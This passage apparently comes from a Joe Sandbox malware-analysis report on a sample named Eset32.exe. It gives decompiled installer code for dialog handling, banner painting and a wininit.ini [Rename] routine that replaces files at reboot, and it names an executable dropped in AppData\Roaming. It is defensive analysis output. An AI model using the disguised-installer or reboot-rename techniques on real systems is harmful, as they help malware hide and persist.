                                                          							__eflags =  *0x40a1dc -  *0x42f464; // 0xffffffff
                                                          							if(__eflags >= 0) {
                                                          								break;
                                                          							}
                                                          							_t117 =  *(_t131 + 0x14);
                                                          							E0040618A(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
                                                          							_push( *((intOrPtr*)(_t131 + 0x20)));
                                                          							_push(0xfffffc19);
                                                          							E0040417B(_t126);
                                                          							_push( *((intOrPtr*)(_t131 + 0x1c)));
                                                          							_push(0xfffffc1b);
                                                          							E0040417B(_t126);
                                                          							_push( *((intOrPtr*)(_t131 + 0x28)));
                                                          							_push(0xfffffc1a);
                                                          							E0040417B(_t126);
                                                          							_t49 = GetDlgItem(_t126, 3);
                                                          							__eflags =  *0x42f4cc - _t134;
                                                          							_v32 = _t49;
                                                          							if( *0x42f4cc != _t134) {
                                                          								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                          								__eflags = _t117;
                                                          							}
                                                          							ShowWindow(_t49, _t117 & 0x00000008); // flag bits from record+0x14 drive control 3 visibility
                                                          							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100); // ... and whether the IDOK control is enabled
                                                          							E0040419D(_t117 & 0x00000002);
                                                          							_t118 = _t117 & 0x00000004;
                                                          							EnableWindow( *0x429858, _t118);
                                                          							__eflags = _t118 - _t134;
                                                          							if(_t118 == _t134) {
                                                          								_push(1);
                                                          							} else {
                                                          								_push(_t134);
                                                          							}
                                                          							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??); // SC_CLOSE: MF_ENABLED (0) if flag bit 2 set, else MF_GRAYED (1), per the pushes above
                                                          							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1); // BM_SETSTYLE, BS_PUSHBUTTON, redraw = TRUE
                                                          							__eflags =  *0x42f4cc - _t134;
                                                          							if( *0x42f4cc == _t134) {
                                                          								_push( *0x42a88c);
                                                          							} else {
                                                          								SendMessageA(_t126, 0x401, 2, _t134); // DM_SETDEFID (WM_USER+1): default push button becomes control 2 (IDCANCEL)
                                                          								_push( *0x429858);
                                                          							}
                                                          							E004041B0();
                                                          							E004060F7(0x42a890, E00403C88());
                                                          							E0040618A(0x42a890, _t126, _t131,  &(0x42a890[lstrlenA(0x42a890)]),  *((intOrPtr*)(_t131 + 0x18)));
                                                          							SetWindowTextA(_t126, 0x42a890);
                                                          							_push(_t134);
                                                          							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
                                                          							__eflags = _t68;
                                                          							if(_t68 != 0) {
                                                          								continue;
                                                          							} else {
                                                          								__eflags =  *_t131 - _t134;
                                                          								if( *_t131 == _t134) {
                                                          									continue;
                                                          								}
                                                          								__eflags =  *(_t131 + 4) - 5;
                                                          								if( *(_t131 + 4) != 5) {
                                                          									DestroyWindow( *0x42ebf8);
                                                          									 *0x42a068 = _t131;
                                                          									__eflags =  *_t131 - _t134;
                                                          									if( *_t131 <= _t134) {
                                                          										goto L58;
                                                          									}
                                                          									_t74 = CreateDialogParamA( *0x42f420,  *_t131 +  *0x42ec00 & 0x0000ffff, _t126,  *(0x40a1e0 +  *(_t131 + 4) * 4), _t131); // template id = record[0] + *0x42ec00; dialog proc taken from the table at 0x40a1e0 indexed by record[4]
                                                          									__eflags = _t74 - _t134;
                                                          									 *0x42ebf8 = _t74;
                                                          									if(_t74 == _t134) {
                                                          										goto L58;
                                                          									}
                                                          									_push( *((intOrPtr*)(_t131 + 0x2c)));
                                                          									_push(6);
                                                          									E0040417B(_t74);
                                                          									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10); // control id 1018 is the placeholder rectangle for the child dialog
                                                          									ScreenToClient(_t126, _t135 + 0x10);
                                                          									SetWindowPos( *0x42ebf8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15); // SWP_NOSIZE|SWP_NOZORDER|SWP_NOACTIVATE; position from the RECT filled above
                                                          									_push(_t134);
                                                          									E00401389( *((intOrPtr*)(_t131 + 0xc)));
                                                          									__eflags =  *0x42ebec - _t134; // 0x0
                                                          									if(__eflags != 0) {
                                                          										goto L61;
                                                          									}
                                                          									ShowWindow( *0x42ebf8, 8); // SW_SHOWNA
                                                          									E004041C7(0x405); // WM_USER+5 (application-defined)
                                                          									goto L58;
                                                          								}
                                                          								__eflags =  *0x42f4cc - _t134;
                                                          								if( *0x42f4cc != _t134) {
                                                          									goto L61;
                                                          								}
                                                          								__eflags =  *0x42f4c0 - _t134;
                                                          								if( *0x42f4c0 != _t134) {
                                                          									continue;
                                                          								}
                                                          								goto L61;
                                                          							}
                                                          						}
                                                          						DestroyWindow( *0x42ebf8);
                                                          						 *0x42f428 = _t134;
                                                          						EndDialog(_t126,  *0x429c60);
                                                          						goto L58;
                                                          					} else {
                                                          						__eflags = _t35 - 1;
                                                          						if(_t35 != 1) {
                                                          							L33:
                                                          							__eflags =  *_t131 - _t134;
                                                          							if( *_t131 == _t134) {
                                                          								goto L61;
                                                          							}
                                                          							goto L34;
                                                          						}
                                                          						_push(0);
                                                          						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
                                                          						__eflags = _t87;
                                                          						if(_t87 == 0) {
                                                          							goto L33;
                                                          						}
                                                          						SendMessageA( *0x42ebf8, 0x40f, 0, 1); // WM_USER+15 to the child dialog
                                                          						__eflags =  *0x42ebec - _t134; // 0x0
                                                          						return 0 | __eflags == 0x00000000;
                                                          					}
                                                          				} else {
                                                          					_t126 = _a4;
                                                          					_t134 = 0;
                                                          					if(_t116 == 0x47) { // WM_WINDOWPOSCHANGED
                                                          						SetWindowPos( *0x42a870, _t126, 0, 0, 0, 0, 0x13); // SWP_NOSIZE|SWP_NOMOVE|SWP_NOACTIVATE: keep the window at 0x42a870 directly behind this one
                                                          					}
                                                          					if(_t116 == 5) { // WM_SIZE
                                                          						asm("sbb eax, eax"); // eax becomes 0 or -1 from the compare on wParam (the size type)
                                                          						ShowWindow( *0x42a870,  ~(_a12 - 1) & _t116); // mask yields SW_SHOW (5) or SW_HIDE (0) for the window at 0x42a870
                                                          					}
                                                          					if(_t116 != 0x40d) { // WM_USER+13 (application-defined)
                                                          						__eflags = _t116 - 0x11;
                                                          						if(_t116 != 0x11) { // WM_QUERYENDSESSION
                                                          							__eflags = _t116 - 0x111;
                                                          							if(_t116 != 0x111) { // WM_COMMAND
                                                          								L26:
                                                          								return E004041E2(_t116, _a12, _a16);
                                                          							}
                                                          							_t133 = _a12 & 0x0000ffff;
                                                          							_t127 = GetDlgItem(_t126, _t133);
                                                          							__eflags = _t127 - _t134;
                                                          							if(_t127 == _t134) {
                                                          								L13:
                                                          								__eflags = _t133 - 1;
                                                          								if(_t133 != 1) {
                                                          									__eflags = _t133 - 3;
                                                          									if(_t133 != 3) {
                                                          										_t128 = 2;
                                                          										__eflags = _t133 - _t128;
                                                          										if(_t133 != _t128) {
                                                          											L25:
                                                          											SendMessageA( *0x42ebf8, 0x111, _a12, _a16);
                                                          											goto L26;
                                                          										}
                                                          										__eflags =  *0x42f4cc - _t134;
                                                          										if( *0x42f4cc == _t134) {
                                                          											_t100 = E0040140B(3);
                                                          											__eflags = _t100;
                                                          											if(_t100 != 0) {
                                                          												goto L26;
                                                          											}
                                                          											 *0x429c60 = 1;
                                                          											L21:
                                                          											_push(0x78);
                                                          											L22:
                                                          											E00404154();
                                                          											goto L26;
                                                          										}
                                                          										E0040140B(_t128);
                                                          										 *0x429c60 = _t128;
                                                          										goto L21;
                                                          									}
                                                          									__eflags =  *0x40a1dc - _t134; // 0xffffffff
                                                          									if(__eflags <= 0) {
                                                          										goto L25;
                                                          									}
                                                          									_push(0xffffffff);
                                                          									goto L22;
                                                          								}
                                                          								_push(_t133);
                                                          								goto L22;
                                                          							}
                                                          							SendMessageA(_t127, 0xf3, _t134, _t134);
                                                          							_t104 = IsWindowEnabled(_t127);
                                                          							__eflags = _t104;
                                                          							if(_t104 == 0) {
                                                          								goto L61;
                                                          							}
                                                          							goto L13;
                                                          						}
                                                          						SetWindowLongA(_t126, _t134, _t134);
                                                          						return 1;
                                                          					} else {
                                                          						DestroyWindow( *0x42ebf8);
                                                          						 *0x42ebf8 = _a12;
                                                          						L58:
                                                          						if( *0x42b890 == _t134) {
                                                          							_t143 =  *0x42ebf8 - _t134; // 0x0
                                                          							if(_t143 != 0) {
                                                          								ShowWindow(_t126, 0xa);
                                                          								 *0x42b890 = 1;
                                                          							}
                                                          						}
                                                          						L61:
                                                          						return 0;
                                                          					}
                                                          				}
                                                          			}

                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
                                                          • ShowWindow.USER32(?), ref: 00403D00
                                                          • DestroyWindow.USER32 ref: 00403D14
                                                          • SetWindowLongA.USER32 ref: 00403D30
                                                          • GetDlgItem.USER32 ref: 00403D51
                                                          • SendMessageA.USER32 ref: 00403D65
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                                                          • GetDlgItem.USER32 ref: 00403E1A
                                                          • GetDlgItem.USER32 ref: 00403E24
                                                          • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403E3E
                                                          • SendMessageA.USER32 ref: 00403E8F
                                                          • GetDlgItem.USER32 ref: 00403F35
                                                          • ShowWindow.USER32(00000000,?), ref: 00403F56
                                                          • EnableWindow.USER32(?,?), ref: 00403F68
                                                          • EnableWindow.USER32(?,?), ref: 00403F83
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
                                                          • EnableMenuItem.USER32 ref: 00403FA0
                                                          • SendMessageA.USER32 ref: 00403FB8
                                                          • SendMessageA.USER32 ref: 00403FCB
                                                          • lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
                                                          • SetWindowTextA.USER32(?,0042A890), ref: 00404004
                                                          • ShowWindow.USER32(?,0000000A), ref: 00404138
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                          • String ID:
                                                          • API String ID: 184305955-0
                                                          • Opcode ID: ed32bf378eed34b85959d54b09fee93901a9971c5acb0b08625fb80f4c2f6060
                                                          • Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
                                                          • Opcode Fuzzy Hash: ed32bf378eed34b85959d54b09fee93901a9971c5acb0b08625fb80f4c2f6060
                                                          • Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E004042E6(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                          				intOrPtr _v8;
                                                          				signed int _v12;
                                                          				void* _v16;
                                                          				struct HWND__* _t52;
                                                          				long _t86;
                                                          				int _t98;
                                                          				struct HWND__* _t99;
                                                          				signed int _t100;
                                                          				signed int _t106;
                                                          				intOrPtr _t107;
                                                          				intOrPtr _t109;
                                                          				int _t110;
                                                          				signed int* _t112;
                                                          				signed int _t113;
                                                          				char* _t114;
                                                          				CHAR* _t115;
                                                          
                                                          				if(_a8 != 0x110) {
                                                          					__eflags = _a8 - 0x111;
                                                          					if(_a8 != 0x111) {
                                                          						L11:
                                                          						__eflags = _a8 - 0x4e;
                                                          						if(_a8 != 0x4e) {
                                                          							__eflags = _a8 - 0x40b;
                                                          							if(_a8 == 0x40b) {
                                                          								 *0x42985c =  *0x42985c + 1;
                                                          								__eflags =  *0x42985c;
                                                          							}
                                                          							L25:
                                                          							_t110 = _a16;
                                                          							L26:
                                                          							return E004041E2(_a8, _a12, _t110);
                                                          						}
                                                          						_t52 = GetDlgItem(_a4, 0x3e8);
                                                          						_t110 = _a16;
                                                          						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
                                                          						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
                                                          							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
                                                          							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                          								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                          								_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                          								_v12 = _t100;
                                                          								__eflags = _t100 - _t109 - 0x800;
                                                          								_v16 = _t109;
                                                          								_v8 = 0x42e3c0;
                                                          								if(_t100 - _t109 < 0x800) {
                                                          									SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                          									SetCursor(LoadCursorA(0, 0x7f02));
                                                          									_push(1);
                                                          									E0040458A(_a4, _v8);
                                                          									SetCursor(LoadCursorA(0, 0x7f00));
                                                          									_t110 = _a16;
                                                          								}
                                                          							}
                                                          						}
                                                          						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
                                                          						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
                                                          							goto L26;
                                                          						} else {
                                                          							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
                                                          							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                          								goto L26;
                                                          							}
                                                          							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
                                                          							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                          								SendMessageA( *0x42f428, 0x111, 1, 0);
                                                          							}
                                                          							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
                                                          							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                          								SendMessageA( *0x42f428, 0x10, 0, 0);
                                                          							}
                                                          							return 1;
                                                          						}
                                                          					}
                                                          					__eflags = _a12 >> 0x10;
                                                          					if(_a12 >> 0x10 != 0) {
                                                          						goto L25;
                                                          					}
                                                          					__eflags =  *0x42985c; // 0x0
                                                          					if(__eflags != 0) {
                                                          						goto L25;
                                                          					}
                                                          					_t112 =  *0x42a068 + 0x14;
                                                          					__eflags =  *_t112 & 0x00000020;
                                                          					if(( *_t112 & 0x00000020) == 0) {
                                                          						goto L25;
                                                          					}
                                                          					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                          					__eflags = _t106;
                                                          					 *_t112 = _t106;
                                                          					E0040419D(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                          					E00404566();
                                                          					goto L11;
                                                          				} else {
                                                          					_t98 = _a16;
                                                          					_t113 =  *(_t98 + 0x30);
                                                          					if(_t113 < 0) {
                                                          						_t107 =  *0x42ebfc; // 0x4ab049
                                                          						_t113 =  *(_t107 - 4 + _t113 * 4);
                                                          					}
                                                          					_push( *((intOrPtr*)(_t98 + 0x34)));
                                                          					_t114 = _t113 +  *0x42f478;
                                                          					_push(0x22);
                                                          					_a16 =  *_t114;
                                                          					_v12 = _v12 & 0x00000000;
                                                          					_t115 = _t114 + 1;
                                                          					_v16 = _t115;
                                                          					_v8 = E004042B1;
                                                          					E0040417B(_a4);
                                                          					_push( *((intOrPtr*)(_t98 + 0x38)));
                                                          					_push(0x23);
                                                          					E0040417B(_a4);
                                                          					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                          					E0040419D( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                          					_t99 = GetDlgItem(_a4, 0x3e8);
                                                          					E004041B0(_t99);
                                                          					SendMessageA(_t99, 0x45b, 1, 0);
                                                          					_t86 =  *( *0x42f434 + 0x68);
                                                          					if(_t86 < 0) {
                                                          						_t86 = GetSysColor( ~_t86);
                                                          					}
                                                          					SendMessageA(_t99, 0x443, 0, _t86);
                                                          					SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                          					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                          					 *0x42985c = 0;
                                                          					SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                          					 *0x42985c = 0;
                                                          					return 0;
                                                          				}
                                                          			}


                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                          • String ID: C:\Users\user\AppData\Roaming\1.exe$N
                                                          • API String ID: 3103080414-4092545277
                                                          • Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                          • Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
                                                          • Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                          • Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 90%
                                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                          				struct tagLOGBRUSH _v16;
                                                          				struct tagRECT _v32;
                                                          				struct tagPAINTSTRUCT _v96;
                                                          				struct HDC__* _t70;
                                                          				struct HBRUSH__* _t87;
                                                          				struct HFONT__* _t94;
                                                          				long _t102;
                                                          				signed int _t126;
                                                          				struct HDC__* _t128;
                                                          				intOrPtr _t130;
                                                          
                                                          				if(_a8 == 0xf) {
                                                          					_t130 =  *0x42f434;
                                                          					_t70 = BeginPaint(_a4,  &_v96);
                                                          					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                          					_a8 = _t70;
                                                          					GetClientRect(_a4,  &_v32);
                                                          					_t126 = _v32.bottom;
                                                          					_v32.bottom = _v32.bottom & 0x00000000;
                                                          					while(_v32.top < _t126) {
                                                          						_a12 = _t126 - _v32.top;
                                                          						asm("cdq");
                                                          						asm("cdq");
                                                          						asm("cdq");
                                                          						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                          						_t87 = CreateBrushIndirect( &_v16);
                                                          						_v32.bottom = _v32.bottom + 4;
                                                          						_a16 = _t87;
                                                          						FillRect(_a8,  &_v32, _t87);
                                                          						DeleteObject(_a16);
                                                          						_v32.top = _v32.top + 4;
                                                          					}
                                                          					if( *(_t130 + 0x58) != 0xffffffff) {
                                                          						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                          						_a16 = _t94;
                                                          						if(_t94 != 0) {
                                                          							_t128 = _a8;
                                                          							_v32.left = 0x10;
                                                          							_v32.top = 8;
                                                          							SetBkMode(_t128, 1);
                                                          							SetTextColor(_t128,  *(_t130 + 0x58));
                                                          							_a8 = SelectObject(_t128, _a16);
                                                          							DrawTextA(_t128, "Name Setup", 0xffffffff,  &_v32, 0x820);
                                                          							SelectObject(_t128, _a8);
                                                          							DeleteObject(_a16);
                                                          						}
                                                          					}
                                                          					EndPaint(_a4,  &_v96);
                                                          					return 0;
                                                          				}
                                                          				_t102 = _a16;
                                                          				if(_a8 == 0x46) {
                                                          					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                          					 *((intOrPtr*)(_t102 + 4)) =  *0x42f428;
                                                          				}
                                                          				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                          			}


                                                          APIs
                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32 ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32 ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextA.USER32(00000000,Name Setup,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F$Name Setup
                                                          • API String ID: 941294808-4002928617
                                                          • Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                          • Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
                                                          • Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                          • Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405D66(void* __ecx) {
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				long _t12;
                                                          				long _t24;
                                                          				char* _t31;
                                                          				int _t37;
                                                          				void* _t38;
                                                          				intOrPtr* _t39;
                                                          				long _t42;
                                                          				CHAR* _t44;
                                                          				void* _t46;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t52;
                                                          				void* _t53;
                                                          
                                                          				_t38 = __ecx;
                                                          				_t44 =  *(_t52 + 0x14);
                                                          				 *0x42c620 = 0x4c554e;
                                                          				if(_t44 == 0) {
                                                          					L3:
                                                          					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca20, 0x400);
                                                          					if(_t12 != 0 && _t12 <= 0x400) {
                                                          						_t37 = wsprintfA(0x42c220, "%s=%s\r\n", 0x42c620, 0x42ca20);
                                                          						_t53 = _t52 + 0x10;
                                                          						E0040618A(_t37, 0x400, 0x42ca20, 0x42ca20,  *((intOrPtr*)( *0x42f434 + 0x128)));
                                                          						_t12 = E00405C90(0x42ca20, 0xc0000000, 4);
                                                          						_t48 = _t12;
                                                          						 *(_t53 + 0x18) = _t48;
                                                          						if(_t48 != 0xffffffff) {
                                                          							_t42 = GetFileSize(_t48, 0);
                                                          							_t6 = _t37 + 0xa; // 0xa
                                                          							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                          							if(_t46 == 0 || E00405D08(_t48, _t46, _t42) == 0) {
                                                          								L18:
                                                          								return CloseHandle(_t48);
                                                          							} else {
                                                          								if(E00405BF5(_t38, _t46, "[Rename]\r\n") != 0) {
                                                          									_t49 = E00405BF5(_t38, _t21 + 0xa, 0x40a3d8);
                                                          									if(_t49 == 0) {
                                                          										_t48 =  *(_t53 + 0x18);
                                                          										L16:
                                                          										_t24 = _t42;
                                                          										L17:
                                                          										E00405C4B(_t24 + _t46, 0x42c220, _t37);
                                                          										SetFilePointer(_t48, 0, 0, 0);
                                                          										E00405D37(_t48, _t46, _t42 + _t37);
                                                          										GlobalFree(_t46);
                                                          										goto L18;
                                                          									}
                                                          									_t39 = _t46 + _t42;
                                                          									_t31 = _t39 + _t37;
                                                          									while(_t39 > _t49) {
                                                          										 *_t31 =  *_t39;
                                                          										_t31 = _t31 - 1;
                                                          										_t39 = _t39 - 1;
                                                          									}
                                                          									_t24 = _t49 - _t46 + 1;
                                                          									_t48 =  *(_t53 + 0x18);
                                                          									goto L17;
                                                          								}
                                                          								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                          								_t42 = _t42 + 0xa;
                                                          								goto L16;
                                                          							}
                                                          						}
                                                          					}
                                                          				} else {
                                                          					CloseHandle(E00405C90(_t44, 0, 1));
                                                          					_t12 = GetShortPathNameA(_t44, 0x42c620, 0x400);
                                                          					if(_t12 != 0 && _t12 <= 0x400) {
                                                          						goto L3;
                                                          					}
                                                          				}
                                                          				return _t12;
                                                          			}


                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                                                          • GetShortPathNameA.KERNEL32 ref: 00405DA0
                                                            • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                            • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                          • GetShortPathNameA.KERNEL32 ref: 00405DBD
                                                          • wsprintfA.USER32 ref: 00405DDB
                                                          • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                                                          • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                                                          • GlobalFree.KERNEL32 ref: 00405EC4
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                                                            • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Eset32.exe,80000000,00000003), ref: 00405C94
                                                            • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                          • String ID: %s=%s$[Rename]
                                                          • API String ID: 2171350718-1727408572
                                                          • Opcode ID: 536ded58655ee36161f9cc370f0aa634966da8d6c53cbb0260df3f09f937f884
                                                          • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
                                                          • Opcode Fuzzy Hash: 536ded58655ee36161f9cc370f0aa634966da8d6c53cbb0260df3f09f937f884
